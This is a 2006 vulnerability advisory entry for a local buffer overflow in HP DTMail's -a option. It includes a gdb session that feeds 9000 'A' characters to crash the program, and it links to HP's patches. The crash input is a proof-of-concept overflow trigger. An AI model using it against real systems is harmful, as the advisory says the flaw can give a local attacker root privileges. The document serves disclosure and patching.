HP DTMail Attachment Parameter Buffer Overflow Vulnerability

2006-10-25T00:00:00
ID SSV:121
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00

Description

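HP DTMail is a mail client used on the desktop.

DTMail has a buffer overflow vulnerability when processing the argument to the -a option. A local attacker can exploit this vulnerability to gain root user privileges.

The following gdb output demonstrates the vulnerability: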

(gdb) r -a -a perl -e 'print "A" x 9000'
Starting program: /cluster/members/member0/tmp/dtmail -a perl -e 'print "A"x 9000'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140

HP dtmail 5.1b

HP has released security bulletins (HPSBUX02162/HPSBTU02163) and corresponding patches for this issue:

HPSBUX02162: SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code. Link: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091

HPSBTU02163: SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code. Link: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793805